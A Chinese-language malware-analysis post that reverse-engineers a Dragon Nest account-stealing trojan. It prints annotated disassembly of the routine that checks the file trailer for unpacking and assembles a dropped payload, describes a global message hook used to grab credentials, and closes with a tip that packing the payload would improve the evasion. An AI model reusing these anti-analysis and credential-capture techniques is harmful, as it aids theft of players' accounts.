首先说明,这种antidebug方式只会使部分分析者一时疏忽造成困扰,玩的是巧,而不是技术~
而确实在最开始的时候也给我造成了一些困扰,当然了,我很菜~ 言归正传~
这是一个“龙之谷”的盗号木马
1,从自身提取一个名为"MWAI"的资源,并释放到系统临时文件夹中,名称为kb****.bin (*的是0~9的随即数字)。
2,接着进行自身验证,通过比较当前进程文件的最后8位是否为7001000000010000来判断木马是否完整(比如脱壳的版本~这个木马用的PEcompact2.x壳),如果验证通过,则提取当前木马文件的后0x170个字节内容追加到刚刚释放的bin文件中,来完成bin文件的组装。
3,加载组装后的bin,并安装全局WH_GETMESSAGE钩子来获取账号信息
组装函数:
代码:
00402A2E /$ 55 push ebp 00402A2F |. 8BEC mov ebp, esp 00402A31 |. 81EC 6C010000 sub esp, 16C 00402A37 |. 8065 D4 00 and byte ptr [ebp-2C], 0 00402A3B |. 53 push ebx 00402A3C |. 56 push esi 00402A3D |. 57 push edi 00402A3E |. C645 C8 4B mov byte ptr [ebp-38], 4B ; 填充"Kernel32.dll" 00402A42 |. C645 C9 65 mov byte ptr [ebp-37], 65 00402A46 |. C645 CA 72 mov byte ptr [ebp-36], 72 00402A4A |. C645 CB 6E mov byte ptr [ebp-35], 6E 00402A4E |. C645 CC 65 mov byte ptr [ebp-34], 65 00402A52 |. C645 CD 6C mov byte ptr [ebp-33], 6C 00402A56 |. C645 CE 33 mov byte ptr [ebp-32], 33 00402A5A |. C645 CF 32 mov byte ptr [ebp-31], 32 00402A5E |. C645 D0 2E mov byte ptr [ebp-30], 2E 00402A62 |. C645 D1 64 mov byte ptr [ebp-2F], 64 00402A66 |. C645 D2 6C mov byte ptr [ebp-2E], 6C 00402A6A |. C645 D3 6C mov byte ptr [ebp-2D], 6C 00402A6E |. 60 pushad 00402A6F |. 61 popad 00402A70 |. 8D45 C8 lea eax, dword ptr [ebp-38] 00402A73 |. 50 push eax ; /FileName 00402A74 |. FF15 00604000 call dword ptr [<&kernel32.LoadLibraryA>>; \LoadLibraryA 00402A7A |. 8945 FC mov dword ptr [ebp-4], eax ; ebp-4 = HMODULE kernel32.dll 00402A7D |. 60 pushad 00402A7E |. 61 popad 00402A7F |. 33DB xor ebx, ebx 00402A81 |. 395D FC cmp dword ptr [ebp-4], ebx 00402A84 |. 0F84 E4010000 je 00402C6E ; 判断LoadLibrary加载kernel32.dll是否成功 00402A8A |. 8D45 A4 lea eax, dword ptr [ebp-5C] ; eax = "athA" 00402A8D |. C645 A4 47 mov byte ptr [ebp-5C], 47 00402A91 |. 50 push eax 00402A92 |. C645 A5 65 mov byte ptr [ebp-5B], 65 00402A96 |. FF75 FC push dword ptr [ebp-4] 00402A99 |. C645 A6 74 mov byte ptr [ebp-5A], 74 00402A9D |. C645 A7 4D mov byte ptr [ebp-59], 4D 00402AA1 |. C645 A8 6F mov byte ptr [ebp-58], 6F 00402AA5 |. C645 A9 64 mov byte ptr [ebp-57], 64 00402AA9 |. C645 AA 75 mov byte ptr [ebp-56], 75 00402AAD |. C645 AB 6C mov byte ptr [ebp-55], 6C 00402AB1 |. C645 AC 65 mov byte ptr [ebp-54], 65 00402AB5 |. C645 AD 46 mov byte ptr [ebp-53], 46 00402AB9 |. C645 AE 69 mov byte ptr [ebp-52], 69 00402ABD |. C645 AF 6C mov byte ptr [ebp-51], 6C 00402AC1 |. C645 B0 65 mov byte ptr [ebp-50], 65 00402AC5 |. C645 B1 4E mov byte ptr [ebp-4F], 4E 00402AC9 |. C645 B2 61 mov byte ptr [ebp-4E], 61 00402ACD |. C645 B3 6D mov byte ptr [ebp-4D], 6D 00402AD1 |. C645 B4 65 mov byte ptr [ebp-4C], 65 00402AD5 |. C645 B5 41 mov byte ptr [ebp-4B], 41 00402AD9 |. 885D B6 mov byte ptr [ebp-4A], bl ; 经过一串填充之后eax = "GetModuleFileNameA" 00402ADC |. E8 50EEFFFF call 00401931 ; GetProcAddress GetModuleFileNameA 00402AE1 |. 8BF0 mov esi, eax 00402AE3 |. 8D45 D8 lea eax, dword ptr [ebp-28] 00402AE6 |. 50 push eax 00402AE7 |. C645 D8 43 mov byte ptr [ebp-28], 43 ; 填充CloseHandle 00402AEB |. FF75 FC push dword ptr [ebp-4] 00402AEE |. C645 D9 6C mov byte ptr [ebp-27], 6C 00402AF2 |. C645 DA 6F mov byte ptr [ebp-26], 6F 00402AF6 |. C645 DB 73 mov byte ptr [ebp-25], 73 00402AFA |. C645 DC 65 mov byte ptr [ebp-24], 65 00402AFE |. C645 DD 48 mov byte ptr [ebp-23], 48 00402B02 |. C645 DE 61 mov byte ptr [ebp-22], 61 00402B06 |. C645 DF 6E mov byte ptr [ebp-21], 6E 00402B0A |. C645 E0 64 mov byte ptr [ebp-20], 64 00402B0E |. C645 E1 6C mov byte ptr [ebp-1F], 6C 00402B12 |. C645 E2 65 mov byte ptr [ebp-1E], 65 00402B16 |. 885D E3 mov byte ptr [ebp-1D], bl 00402B19 |. E8 13EEFFFF call 00401931 ; GetProcAddress CloseHandle 00402B1E |. 83C4 10 add esp, 10 00402B21 |. 8945 A0 mov dword ptr [ebp-60], eax 00402B24 |. 8D45 E4 lea eax, dword ptr [ebp-1C] 00402B27 |. C645 E4 43 mov byte ptr [ebp-1C], 43 00402B2B |. 50 push eax 00402B2C |. 8D45 B8 lea eax, dword ptr [ebp-48] 00402B2F |. 50 push eax ; /FileName 00402B30 |. C645 E5 72 mov byte ptr [ebp-1B], 72 ; |填充"CreateFileA" 00402B34 |. C645 E6 65 mov byte ptr [ebp-1A], 65 ; | 00402B38 |. C645 E7 61 mov byte ptr [ebp-19], 61 ; | 00402B3C |. C645 E8 74 mov byte ptr [ebp-18], 74 ; | 00402B40 |. C645 E9 65 mov byte ptr [ebp-17], 65 ; | 00402B44 |. C645 EA 46 mov byte ptr [ebp-16], 46 ; | 00402B48 |. C645 EB 69 mov byte ptr [ebp-15], 69 ; | 00402B4C |. C645 EC 6C mov byte ptr [ebp-14], 6C ; | 00402B50 |. C645 ED 65 mov byte ptr [ebp-13], 65 ; | 00402B54 |. C645 EE 41 mov byte ptr [ebp-12], 41 ; | 00402B58 |. 885D EF mov byte ptr [ebp-11], bl ; | 00402B5B |. C645 B8 4B mov byte ptr [ebp-48], 4B ; |填充"Kernel32.dll" 00402B5F |. C645 B9 65 mov byte ptr [ebp-47], 65 ; | 00402B63 |. C645 BA 72 mov byte ptr [ebp-46], 72 ; | 00402B67 |. C645 BB 6E mov byte ptr [ebp-45], 6E ; | 00402B6B |. C645 BC 65 mov byte ptr [ebp-44], 65 ; | 00402B6F |. C645 BD 6C mov byte ptr [ebp-43], 6C ; | 00402B73 |. C645 BE 33 mov byte ptr [ebp-42], 33 ; | 00402B77 |. C645 BF 32 mov byte ptr [ebp-41], 32 ; | 00402B7B |. C645 C0 2E mov byte ptr [ebp-40], 2E ; | 00402B7F |. C645 C1 64 mov byte ptr [ebp-3F], 64 ; | 00402B83 |. C645 C2 6C mov byte ptr [ebp-3E], 6C ; | 00402B87 |. C645 C3 6C mov byte ptr [ebp-3D], 6C ; | 00402B8B |. 885D C4 mov byte ptr [ebp-3C], bl ; | 00402B8E |. FF15 00604000 call dword ptr [<&kernel32.LoadLibraryA>>; \LoadlibraryA Kernel32.dll 00402B94 |. 50 push eax 00402B95 |. E8 97EDFFFF call 00401931 ; GetProcAddress CreateFileA 00402B9A |. 59 pop ecx 00402B9B |. 8945 9C mov dword ptr [ebp-64], eax 00402B9E |. 59 pop ecx 00402B9F |. 8D85 94FEFFFF lea eax, dword ptr [ebp-16C] 00402BA5 |. 68 04010000 push 104 ; MAX_PATH 00402BAA |. 50 push eax ; buffer 00402BAB |. 53 push ebx ; 0 00402BAC |. FFD6 call esi ; GetModuleFileNameA 获取当前进程路径 00402BAE |. 53 push ebx ; 0 00402BAF |. 53 push ebx ; 0 00402BB0 |. 6A 03 push 3 ; OPEN_EXISTING 00402BB2 |. 53 push ebx ; 0 00402BB3 |. 6A 01 push 1 ; FILE_SHARE_READ 00402BB5 |. 8D85 94FEFFFF lea eax, dword ptr [ebp-16C] 00402BBB |. 68 00000080 push 80000000 00402BC0 |. 50 push eax 00402BC1 |. FF55 9C call dword ptr [ebp-64] ; CreateFileA 返回当前进程的HANDLE 00402BC4 |. 8B35 18604000 mov esi, dword ptr [<&kernel32.SetFileP>; kernel32.SetFilePointer 00402BCA |. 6A 02 push 2 ; /Origin = FILE_END 00402BCC |. 53 push ebx ; |pOffsetHi 00402BCD |. 6A FC push -4 ; |OffsetLo = FFFFFFFC (-4.) 00402BCF |. 50 push eax ; |hFile 00402BD0 |. 8945 FC mov dword ptr [ebp-4], eax ; | 00402BD3 |. FFD6 call esi ; \SetFilePointer 设置文件指针到结尾 -4处 00402BD5 |. 8D45 F4 lea eax, dword ptr [ebp-C] 00402BD8 |. 8B3D 14604000 mov edi, dword ptr [<&kernel32.ReadFile>; kernel32.ReadFile 00402BDE |. 53 push ebx ; /pOverlapped 00402BDF |. 50 push eax ; |pBytesRead 00402BE0 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; | 00402BE3 |. 6A 04 push 4 ; |BytesToRead = 4 00402BE5 |. 50 push eax ; |Buffer 00402BE6 |. FF75 FC push dword ptr [ebp-4] ; |hFile 00402BE9 |. FFD7 call edi ; \ReadFile 读出文件最后的四个字节内容 00402BEB |. 817D F0 00000>cmp dword ptr [ebp-10], 10000 ; 与10000对比 00402BF2 |. 75 74 jnz short 00402C68 ; 判断文件的完整性,病毒原始文件的最后四个字节的值就是0x10000 00402BF4 |. 6A 02 push 2 ; /Origin = FILE_END 00402BF6 |. 53 push ebx ; |pOffsetHi = 0 00402BF7 |. 6A F8 push -8 ; |OffsetLo = FFFFFFF8 (-8.) 00402BF9 |. FF75 FC push dword ptr [ebp-4] ; |hFile 00402BFC |. FFD6 call esi ; \SetFilePointer 设置文件指针到FILE_END - 8 00402BFE |. 8D45 F4 lea eax, dword ptr [ebp-C] 00402C01 |. 53 push ebx ; /POverlapped = NULL 00402C02 |. 50 push eax ; |pBytesRead 00402C03 |. 8D45 F8 lea eax, dword ptr [ebp-8] ; | 00402C06 |. 6A 04 push 4 ; |BytesToRead = 4 00402C08 |. 50 push eax ; |Buffer 00402C09 |. FF75 FC push dword ptr [ebp-4] ; |hFile 00402C0C |. FFD7 call edi ; \ReadFile 读去当前文件的FILE_END - 8 起的4个字节 00402C0E |. 8B45 F8 mov eax, dword ptr [ebp-8] ; 如果是病毒原始文件,这块应该是0x170 00402C11 |. 6A 02 push 2 ; /Origin = FILE_END 00402C13 |. F7D8 neg eax ; |取补 00402C15 |. 53 push ebx ; |pOffsetHi 00402C16 |. 50 push eax ; |如果是原始病毒文件,这里应该是十进制的-368 00402C17 |. FF75 FC push dword ptr [ebp-4] ; |hFile 00402C1A |. FFD6 call esi ; \SetFilePointer 设置文件指针到FILE_END - 368 00402C1C |. FF75 F8 push dword ptr [ebp-8] ; /如果是病毒原始文件,这块应该是0x170 00402C1F |. FF15 70604000 call dword ptr [<&MSVCRT.malloc>] ; \如果是病毒原始文件,则分配0x170大小的堆空间 00402C25 |. 59 pop ecx 00402C26 |. 8945 98 mov dword ptr [ebp-68], eax ; 把分配的堆指针传入局部变量 00402C29 |. 8D4D F4 lea ecx, dword ptr [ebp-C] 00402C2C |. 53 push ebx ; 0 00402C2D |. 51 push ecx 00402C2E |. FF75 F8 push dword ptr [ebp-8] ; 0x170 00402C31 |. 50 push eax ; malloc分配的堆空间 00402C32 |. FF75 FC push dword ptr [ebp-4] ; hFile 当前病毒的文件handle 00402C35 |. FFD7 call edi ; ReadFile 读取病毒文件的最后368个字节内容 00402C37 |. 53 push ebx 00402C38 |. 53 push ebx 00402C39 |. 6A 03 push 3 ; OPEN_EXISTING 00402C3B |. 53 push ebx 00402C3C |. 6A 01 push 1 ; FILE_SHARE_READ 00402C3E |. 68 000000C0 push C0000000 ; GENERIC_READ | GENERIC_WRITE 00402C43 |. FF75 08 push dword ptr [ebp+8] ; LPCTSTR lpFileName 00402C46 |. FF55 9C call dword ptr [ebp-64] ; CreateFileA 打开刚刚在临时文件夹下释放的bin文件 00402C49 |. 6A 02 push 2 ; FILE_END 00402C4B |. 8BF8 mov edi, eax 00402C4D |. 53 push ebx ; PLONG lpDistanceToMoveHigh 0 00402C4E |. 53 push ebx ; LONG lDistanceToMove 0 00402C4F |. 57 push edi ; 刚在临时文件夹下创建的bin文件的handle 00402C50 |. FFD6 call esi ; SetFilePointer 设置文件指针到文件的结尾 00402C52 |. 8D45 F4 lea eax, dword ptr [ebp-C] 00402C55 |. 53 push ebx ; /pOverlapped = NULL 00402C56 |. 50 push eax ; |pBytesWritten 00402C57 |. FF75 F8 push dword ptr [ebp-8] ; |nBytesToWrite 如果是病毒原始文件,则这里应该是0x170 00402C5A |. FF75 98 push dword ptr [ebp-68] ; |Buffer 00402C5D |. 57 push edi ; |hFile 00402C5E |. FF15 10604000 call dword ptr [<&kernel32.WriteFile>] ; \WriteFile 从当前文件中提取并在bin文件的末尾写入0x170个字节 00402C64 |. 57 push edi ; 至此完成了bin文件的组装,先验证文件是否被脱壳了,如果没脱壳,说明没在调试,则完成bin文件的组装,从自身中提取最后的0x170个字节,然后写入bin文件的结尾 00402C65 |. FF55 A0 call dword ptr [ebp-60] ; CloseHandle 00402C68 |> FF75 FC push dword ptr [ebp-4] 00402C6B |. FF55 A0 call dword ptr [ebp-60] ; CloseHandle 关闭文件handle 00402C6E |> 5F pop edi 00402C6F |. 5E pop esi 00402C70 |. 33C0 xor eax, eax ; 返回0 00402C72 |. 5B pop ebx 00402C73 |. C9 leave 00402C74 \. C3 retn
试想分析者分析时晃过了这块,bin又不全~~
如果顺便把bin也加上壳效果会更好~
当然这一些都是基于分析者的能力和态度~~
